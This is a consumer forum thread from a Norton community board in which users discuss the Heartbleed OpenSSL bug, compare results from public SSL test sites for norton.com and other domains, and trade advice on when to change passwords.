"I went through a lot of effort to implement a test that verifies the problem without retrieving any bytes from the server, other than the bytes we send in the heartbeat request. So it should be safe to use."
The Qualys SSL Server Test was recently updated to check for the Heartbleed vulnerability in OpenSSL, but the overall test score (ranging from A to F) appears to be based on multiple configuration settings for the SSL web server, and not just this OpenSSL vulnerability.
The Norton forum can be accessed with two different URLs - via a standard HTTP protocol (http://community.norton.com/) or via a partially encrypted HTTP Secure protocol (https://community.norton.com/) which signals your browser to use an added encryption layer of SSL/TLS to create a secure channel between your browser and the web server. I'm guessing that community.norton.com is given a score of A- because the Qualys test defaults to the HTTP Secure (https://) connection, although I could be completely wrong about that.
----------- MS Windows 32-bit Vista Home Premium SP2 * Firefox 28.0 * IE 9.0 * NIS 2013 v. 20.4.0.40 HP Pavilion dv6835ca, Intel Core2Duo CPU T5550 @ 1.83 GHz, 3.0 GB RAM, NVIDIA GeForce 8400M GS
Just out of curiosity, I tried the tester at https://www.ssllabs.com/ssltest/index.html with norton.com. I took 30-40 seconds to report back on 3 servers with inconsistent results & an F grade on one. So on a whim I entered www.ssllabs.com and it came back in less than a second with a list of 5 servers, all ranked A+... Yeah, right.
Yes I said norton.com and symantec.com both got an F rating, but it said they were NOT vulnerable to the Heartbleed attack.
Ok so you don't think that is a valid tester? I just thought he was doing a lot more thourough testing, but I'm no security expert.
Just out of curiosity, I tried the tester at https://www.ssllabs.com/ssltest/index.html with norton.com. I took 30-40 seconds to report back on 3 servers with inconsistent results & an F grade on one. So on a whim I entered www.ssllabs.com and it came back in less than a second with a list of 5 servers, all ranked A+... .
Hi gtalbot:
If you want to re-run the test for www.ssllabs.com from scratch you have to click the Clear Cache link. Testing all 5 IP addresses for that URL took about 5 minutes on my computer.
----------- MS Windows 32-bit Vista Home Premium SP2 * Firefox 28.0 * IE 9.0 * NIS 2013 v. 20.4.0.40 HP Pavilion dv6835ca, Intel Core2Duo CPU T5550 @ 1.83 GHz, 3.0 GB RAM, NVIDIA GeForce 8400M GS
I've no idea but I would not go around checking websites to see if they are OK -- I'd let the professional security people do it with their protected systems.
Hey I just thought of something that may be totally of the mark. Chances are that in most cases we’ll need to change our website passwords I know this sounds crazy and probably is, but does this whole ssl thing also effect our routers connecting to the internet? I mean that is encrypted right? So is that compromised too
If you change the ISP master account password the systems using that account to connect have to be updated in the control panel etc. as each system (computer) if they are using automatic login with saved password will be trying with the old password to connect to the network which should return with a error or failure (wrong username or password).
Ok so my ISP is timewarnercable but when I put that in the tester, I can get a real reading Plus not sure what website my router goes to when connecting to the server for internet service My guess is that it would be different then the server for paying my bill
Ok so my ISP is timewarnercable but when I put that in the tester, I can get a real reading Plus not sure what website my router goes to when connecting to the server for internet service My guess is that it would be different then the server for paying my bill
Hi Calls:
The Sophos article recommended by F4E in message # 25 (and again in message # 46) might address some of your concerns. That article suggests that users hold off changing their login passwords until the company hosting the login page either confirms that you were never in danger (i.e., they did not use OpenSSL protocol on their https:// server) or they have patched their OpenSSL software and re-issued their security certificates. The assumption is that there has likely been an upswing in the number of hackers trying to exploit this Heartbleed vulnerability since it was announced this week, and if you change your password on a server that is still vulnerable you're just increasing your chances of having your new password stolen.
I can't blame anyone for being proactive and using one of the public Heartbleed test sites to check the security of various servers using the HTTP Secure (https://) protocol, but some of these public test sites were thrown together very quickly and are still being revised on a daily basis to work out the bugs. I noticed the Heartbleed test at http://filippo.io/Heartbleed/, for example, has now been updated to give the user the option to check/ignore security certificates on the site. The Sophos article here also cautions that testing a website for "heartbleed" could give an incomplete answer if the company outsources operation of their servers to a third-party mirror site. Users should also be cautioned that most web pages use the standard HTTP protocol (http://) and you should always assume that data shared on an http:// site is insecure - the public Heartbleed test sites were designed to check the security of HTTP Secure (https://) sites using the SSL\TLS protocol for secure login, payment and banking transactions.
I'm very disappointed that Symantec still hasn't posted information in the Norton Toolbar / Norton Identtiy Safe board to let Norton customers know if the server(s) used for storing encrypted Identity Safe login passwords (i.e., the online vault) use the OpenSSL protocol. ----------- MS Windows 32-bit Vista Home Premium SP2 * Firefox 28.0 * IE 9.0 * NIS 2013 v. 20.4.0.40 HP Pavilion dv6835ca, Intel Core2Duo CPU T5550 @ 1.83 GHz, 3.0 GB RAM, NVIDIA GeForce 8400M GS
Some information/speculation about the router question in this BBC article: http://m.bbc.com/news/technology-26985818 (posted in Calls’ thread, but thought it might be useful here, too)
https://ssltools.websecurity.symantec.com/checker/ This is Symantec's own SSL certificate check tool. I entered Norton.com. See screenshot for the results. On the one hand, it says that the "server is not vulnerable to the Heartbleed attack." On the other hand, it says "Certificate installation check failed." Not sure what to make of this.
Okay. Instead of just entering Norton.com this time, I added the "www." before it and I got this. Although this time the certificate installation check was successful, I'm still seeing the orange exclamation mark. Plus, under Common Name, the sub-domain names in the above screenshot and the ones here don't seem to overlap. For example, account.norton.com appears in the "failed" screenshot but not in the "successul" one. Does this mean account.norton.com's SSL certificate has not yet been patched? So many questions...
